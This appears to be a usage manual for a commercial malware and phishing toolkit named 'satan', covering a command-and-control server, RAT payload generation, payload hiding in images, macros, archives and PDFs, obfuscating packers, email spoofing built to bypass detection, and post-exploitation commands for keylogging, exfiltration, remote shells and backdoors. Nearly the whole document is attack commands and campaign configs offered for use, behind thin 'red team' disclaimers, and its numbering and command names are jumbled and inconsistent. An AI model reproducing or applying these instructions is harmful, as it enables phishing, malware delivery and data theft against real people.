Installation and Usage Guide

1. Installation Guide

Prerequisites

A system running Linux, macOS, or Windows.
Golang installed on your system (minimum version 1.18).
Admin/root privileges for certain commands and installations.
Tools like `git`, `wget`, or `curl` for downloading dependencies.

Steps to Install

Clone the repository containing the software:

git clone https://username@the-satan.xyz/token-received-via-email/x-satan.git

Navigate to the project directory:
```
cd x-satan
```
Build the Go project:
```
go build -o c2server main.go
```

Activate the software:

./setup --key-[Activation key received via email] --user-token [user token in email] --activate

Move the binary to a system-wide executable path (optional):
```
sudo mv c2server /usr/local/bin/
```
Run the server:
```
./c2server
```
Usage CLI manual:
```
./satan --manual
```

Help command:

./satan -h

Command-Line Interface (CLI) Features

1. Login System

To ensure secure access, the software includes a CLI-based login system. Use the following commands:

Login:

./satan --login --username yourUsername --password yourPassword --token yourtoken

Logout:
```
./satan --logout
```

2. Subaccount Setup

Create and manage subaccounts for team members or collaborators:

Create a subaccount:

./satan --create-subaccount --username subUser --password subPass

View subaccounts:
```
./satan --list-subaccounts
```

Delete a subaccount:

./satan --delete-subaccount --username subUser

3. Payload Importation

Import custom payloads into the system:

Import a payload:

./satan --import-payload --file path/to/payload

List imported payloads:
```
./satan --list-payloads
```
Delete a payload:
```
./satan --delete-payload --id payloadID
```

4. IMAP and POP3 Server Login

Configure the software to access email servers:

IMAP Server Login:

./satan --imap-login --server imap.example.com --port 993 --username email@example.com --password emailPassword

POP3 Server Login:

./satan --pop-login --server pop.example.com --port 995 --username email@example.com --password emailPassword

5. Termux Monitor Setup

Use Termux on Android to monitor the server:

Install Termux: Download it from the official site or app store.
Install SSH:
```
pkg install openssh
```
Connect to the server:
```
ssh username@your-server-ip
```
Monitor logs:
```
tail -f /path/to/server/logs
```

3. Additional Instructions On Chain Spoofing

The software is designed for red team operations and ethical hacking. Below are additional usage scenarios:

Automated Campaign Management

Set up fully automated campaigns using JSON configuration files. Example:

{
    "name": "EmailSpoofCampaign",
    "target_emails": ["target1@example.com", "target2@example.com"],
    "payload": "stego_image.png",
    "server": "smtp.example.com",
    "port": 587,
    "credentials": {
        "username": "spoof@example.com",
        "password": "password"
    }
}

Run the campaign:

./satan --run-campaign --config campaign.json

2. Usage Guide

Command-Line Interface (CLI) Usage

The software provides a comprehensive CLI for setting up and managing campaigns. Below are common commands:

Start the C2 Server:
```
./c2server --start
```

Configure Campaign:

./c2server --configure --campaign "SocialEngTest"

Generate Payload:

./c2server --generate-payload --type rat --output payload.exe

View Logs:
```
./c2server --logs
```

Social Engineering Execution

1. Creating a Custom Script with Steganography

Embed payloads into images using Go-based libraries like `github.com/auyer/steganography`:

package main

import (
    "github.com/auyer/steganography"
    "os"
)

func main() {
    inputFile, _ := os.Open("image.png")
    outputFile, _ := os.Create("stego_image.png")
    payload := []byte("YourEncodedPayloadHere")
    steganography.Encode(inputFile, outputFile, payload)
}

2. Embedding Payload in a Macro-Enabled Document

Use `satan` to generate payloads and embed them into Office documents:

satan -p windows/macro/embed LHOST=192.168.1.10 LPORT=4445 -f vba > payload.vba

Then inject the generated VBA macro into a Word document.

3. Using Satan Packer Tools

Use Go-based packer tools to obfuscate payloads:

satan --target app.exe --input payload.vba --output packed_payload.exe

4. Hiding Payload in ZIP/RAR Files

Automate extraction and execution with scripting:

echo "@echo off\nstart payload.exe" > autorun.bat

Add the batch file and payload to the archive.

5. Hiding and Executing Payload in PDFs, Audio, or Video

Using satan to embed payloads:

satan --embed payload.exe --input file.pdf --output malicious.pdf

For videos or audio, add input file name and extentions to embed payloads in metadata or unused streams.

3. Advanced Campaign Management

Overview

The software supports creating and managing multiple advanced campaigns for phishing, payload delivery, and post-exploitation. Configure campaigns using JSON templates:

{
    "name": "PhishingCampaign",
    "targets": ["user1@example.com", "user2@example.com"],
    "payload": "payload.png",
    "delivery": "email"
}

Command Examples

Run Campaign:

./c2server --run-campaign PhishingCampaign

View Active Campaigns:
```
./c2server --list-campaigns
```

Stop Campaign:

./c2server --stop-campaign PhishingCampaign

4. Post-Exploitation Techniques

Once a payload is executed on a target system, the following techniques are supported:

Keylogging: Collect keystrokes from compromised systems.
File Exfiltration: Download sensitive files to the C2 server.
Command Execution: Run shell commands remotely.
Persistence: Establish backdoors to retain access even after reboots.

Command Examples

./c2server --execute-command "ls -la" --target 192.168.1.5

5. Security and Best Practices

Follow these best practices while using the software:

Use the software in controlled environments or with explicit authorization.
Encrypt communication between the C2 server and targets.
Select from the lists of support emails sent to you on signup.

2. Automations Command using Hive

Hive Commands

Start the service:
```
./satan hive --start
```
Stop the service:
```
./satan hive --stop
```
View status:
```
./satan hive --status
```

Generate payload:

./satan hive --automate --type rat --method stealth

Application GUI

Satan is a GUI software for the Deluxe plan only to turn GUI on/off On Deluxe:

./satan --gui --switch

./satan --terminal --switch

Web GUI Launch

To launch the web-based graphical user interface (GUI) available on basic plan:

./satan --web-gui

Access the GUI via http://localhost:8888.

3. Email Spoofing Techniques

Bypassing Security Detections

Basic Email Spoofing:

./satan --email-spoof --smtp [server]:port --passowrd [password] --email [email] --run-grit --bypass-detection --grab-keys --from "spoofed@example.com" --to "target@example.com" --subject "Urgent Update" --body "Click the link below." --satan-mode

Advanced Spoofing:

Use crafted headers for certain security filters:

./satan --email-spoof --smtp-file credentials.txt --from "trusted@domain.com" --to "victim@domain.com" --headers "X-Trusted: true; Reply-To: attacker@malicious.com" --relay --satan-mode

Email Monitoring

Monitor emails sent through the spoofing tool for delivery and response:

./satan --email-monitor --log-file email_logs.txt

4. Hacking Coverage

Payload Delivery

Steganography: Embed payloads in images:

./satan --steg-hide --input image.png --payload payload.exe --output stego_image.png

Macro-Enabled Documents: Generate malicious macros:

./satan --macro-gen --payload payload.exe --output malicious_macro.docm

Obfuscation: Pack and obfuscate payloads:

./satab --obfuscate --input payload.exe --output obfuscated_payload.exe

Command-and-Control (C2)

Initiate Listener:
```
./satan --start-c2 --port 4444
```

Connect Backdoor:

./satan --connect-backdoor --target 192.168.1.10 --port 4444

Post-Exploitation

Keylogging: Enable keylogger on a compromised system:
```
./satan --keylogger --output logs.txt
```

File Exfiltration: Transfer files back to the server:

./satan --exfiltrate --file /path/to/file.txt --target 192.168.1.10

Remote Shell: Execute shell commands:

./satan --remote-shell --target 192.168.1.10

5. Best Practices

To ensure safe and responsible use of the tool, follow these guidelines:

Only use the tool in environments where you have explicit permission.
Regularly update the tool to ensure you have the latest security patches.
Encrypt all communications between the server and clients.
Log all activities for auditing purposes.
For GUI usage go to http://localhost:8888/usage.